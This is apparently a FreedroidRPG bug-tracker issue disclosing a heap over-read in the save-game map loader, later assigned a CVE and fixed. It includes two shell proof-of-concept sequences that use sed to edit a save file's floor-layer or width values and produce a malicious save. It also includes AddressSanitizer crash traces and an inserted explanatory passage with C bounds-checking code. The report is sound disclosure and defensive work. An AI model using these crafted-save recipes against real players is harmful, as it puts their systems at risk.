Issue 952

Title: Heap over-read in loading untrusted save game
Priority: release-blocker
Status: resolved
Assigned To: fluzz
Keywords:
Linked issues: issue968 (CVE-2020-14938: An issue was discovered in map.c)
Watchers: fluzz

Submitted on 2019-07-25 14h00 by mmmds, last changed by fluzz.

Messages
Author: mmmds Date: 2019-07-25   14h00
This issue assumes that users may load malicious save games, for example downloaded or received from other users.

Reading outside the "this_line" buffer is possible by manipulating the loadlevel->floor_layers (>= 48) or loadlevel->xlen (>= 2048) values in the save game file.

map.c
static char *decode_map(level *loadlevel, char *data)
836 		memset(this_line, 0, 4096);

845 		for (col = 0; col < loadlevel->xlen; col++) {

850 				tmp = strtol(this_line + 4 * (loadlevel->floor_layers * col + layer), NULL, 10);


PoC 1:
CH="mmm"
cd ~/.freedroid_rpg
mv $CH.shp $CH.gz
gunzip $CH.gz
sed -i -e "0,/floor layers: 2/s/floor layers: 2/floor layers: 48/" $CH
gzip $CH
mv $CH.gz $CH.shp

PoC 2:
CH="mmm"
cd ~/.freedroid_rpg
mv $CH.shp $CH.gz
gunzip $CH.gz
sed -i -e "0,/xlen of this level: 90/s/xlen of this level: 90/xlen of this level: 2048/" $CH
gzip $CH
mv $CH.gz $CH.shp


Crash for PoC 1:

=================================================================
==24662==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb27ed580 at pc 0xb7aaefd8 bp 0xbfb2a1a8 sp 0xbfb29d7c
READ of size 1 at 0xb27ed580 thread T0
    #0 0xb7aaefd7 in strtol (/usr/lib/i386-linux-gnu/libasan.so.2+0x6efd7)
    #1 0x80fc8cc in decode_map /root/projects/freedroid-src/src/map.c:850
    #2 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #3 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #4 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #5 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #6 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #7 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-src/src/menu.c:1796
    #8 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-src/src/menu.c:1827
    #9 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #10 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #11 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #12 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #13 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #14 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #15 0xb75f7636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #16 0x805c3ee  (/root/projects/freedroid-src/bin/bin/freedroidRPG+0x805c3ee)

0xb27ed580 is located 128 bytes to the right of 4096-byte region [0xb27ec500,0xb27ed500)
allocated by thread T0 here:
    #0 0xb7ad6f8e in calloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96f8e)
    #1 0x814a4fd in MyMalloc /root/projects/freedroid-src/src/text_public.c:68
    #2 0x80fc709 in decode_map /root/projects/freedroid-src/src/map.c:825
    #3 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #4 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #5 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #6 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #7 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #8 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-src/src/menu.c:1796
    #9 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-src/src/menu.c:1827
    #10 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #11 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #12 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #13 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #14 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #15 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #16 0xb75f7636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strtol
==24662==ABORTING  



Crash for PoC 2:

=================================================================
==24677==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb27ee900 at pc 0xb7acbfd8 bp 0xbf9a1d58 sp 0xbf9a192c
READ of size 1 at 0xb27ee900 thread T0
    #0 0xb7acbfd7 in strtol (/usr/lib/i386-linux-gnu/libasan.so.2+0x6efd7)
    #1 0x80fc8cc in decode_map /root/projects/freedroid-src/src/map.c:850
    #2 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #3 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #4 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #5 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #6 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #7 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-src/src/menu.c:1796
    #8 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-src/src/menu.c:1827
    #9 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #10 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #11 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #12 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #13 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #14 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #15 0xb7614636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #16 0x805c3ee  (/root/projects/freedroid-src/bin/bin/freedroidRPG+0x805c3ee)

0xb27ee900 is located 0 bytes to the right of 4096-byte region [0xb27ed900,0xb27ee900)
allocated by thread T0 here:
    #0 0xb7af3f8e in calloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96f8e)
    #1 0x814a4fd in MyMalloc /root/projects/freedroid-src/src/text_public.c:68
    #2 0x80fc709 in decode_map /root/projects/freedroid-src/src/map.c:825
    #3 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #4 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #5 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #6 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #7 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #8 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-src/src/menu.c:1796
    #9 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-src/src/menu.c:1827
    #10 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #11 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #12 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #13 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #14 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #15 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #16 0xb7614636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strtol
==24677==ABORTING
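The report boils down to one unchecked index: decode_map reads the 4-char field at this_line + 4 * (floor_layers * col + layer) from a 4096-byte row buffer, and nothing ties floor_layers or xlen from the save file to that buffer size. The following is an added illustration of the kind of bounds check a loader needs; it is not the project's code and not the fix referenced in the later comments. It assumes the 4096-byte buffer and the 4-char-per-tile layout shown in the quoted snippet, and the sample row is constructed.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

#define MAP_LINE_BUF 4096   /* size of this_line in decode_map, per the report */
#define TILE_FIELD   4      /* decode_map reads one 4-char field per tile */
/* Up-front check: do all fields for xlen tiles x floor_layers layers fit
 * in a buf_size-byte row buffer? Rejects non-positive values and overflow. */
static bool map_row_fits(long floor_layers, long xlen, size_t buf_size)
{
    if (floor_layers <= 0 || xlen <= 0)
        return false;
    if (floor_layers > LONG_MAX / xlen)      /* floor_layers * xlen would wrap */
        return false;
    long tiles = floor_layers * xlen;
    if (tiles > LONG_MAX / TILE_FIELD)       /* byte count would wrap */
        return false;
    return (unsigned long)tiles * TILE_FIELD <= buf_size;
}

/* Per-access variant: parse the field for (col, layer) only if it lies inside
 * the NUL-terminated text actually present in the row buffer. */
static bool read_tile(const char *line, size_t buf_size, long floor_layers,
                      long col, long layer, long *out)
{
    if (floor_layers <= 0 || col < 0 || layer < 0 || layer >= floor_layers)
        return false;
    if (col > (LONG_MAX / TILE_FIELD - layer) / floor_layers)   /* index wrap */
        return false;
    size_t off = (size_t)TILE_FIELD * ((size_t)floor_layers * (size_t)col + (size_t)layer);
    const char *nul = memchr(line, '\0', buf_size);
    size_t len = nul ? (size_t)(nul - line) : buf_size;
    if (off > len || len - off < TILE_FIELD)  /* field would run past the text */
        return false;
    char field[TILE_FIELD + 1] = {0};         /* bounded copy: strtol cannot run on */
    memcpy(field, line + off, TILE_FIELD);
    char *end; *out = strtol(field, &end, 10);
    return end != field;                      /* at least one digit parsed */
}

/* Constructed sample row (not from a real save): 2 layers x 3 columns. */
static const char sample_row[] = "   1   2  10  11 100 101";

/* Returns the tile value at (col, layer) in sample_row, or -1 if rejected. */
static long demo_read(long col, long layer)
{
    long v;
    return read_tile(sample_row, sizeof sample_row, 2, col, layer, &v) ? v : -1;
}
```

With the values from the two PoCs, map_row_fits(48, 90, 4096) and map_row_fits(2, 2048, 4096) both return false, while the stock 2-layer, xlen 90 level passes.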
Author: fluzz Date: 2020-06-29   13h50
see issue968
Author: fluzz Date: 2021-11-13   22h29
Fixed by commit 17711a426
Author: fluzz Date: 2021-12-24   10h34
Fixed in commit 17711a4268
History
Date                User   Action  Args
2021-12-24 10:34:16 fluzz  set     messages: + msg3722
2021-11-13 22:29:30 fluzz  set     status: open -> resolved; messages: + msg3719
2021-11-13 16:56:17 fluzz  link    issue968 linked
2021-11-13 16:56:09 fluzz  set     linked: + CVE-2020-14938: An issue was discovered in map.c
2021-11-05 10:52:18 fluzz  set     priority: bug -> release-blocker
2020-06-29 13:50:13 fluzz  set     assignedto: fluzz; messages: + msg3693; nosy: + fluzz
2019-07-25 14:00:11 mmmds  create